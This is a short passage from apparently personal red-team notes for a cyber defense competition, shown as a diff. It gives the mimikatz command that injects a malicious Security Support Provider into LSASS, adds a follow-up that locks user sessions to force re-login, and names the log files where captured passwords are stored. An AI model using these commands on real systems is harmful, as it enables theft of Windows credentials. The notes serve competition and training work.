KhaelK138/KhaelK138.github.io/markdown/RedTeamingCCDC.md

 **MemSSP**
 - Injects a new Security Support Provider into LSASS
 - `mimikatz "privilege::debug" "misc::memssp" "exit"`
+  - Can follow this up with `misc::lock /process:explorer.exe` to LOG OUT active users!!
 - After each authentication, password is stored in `C:\Windows\System32\mimilsa.log` or `C:\Windows\System32\kiwissp.log`

 **Golden Certificate**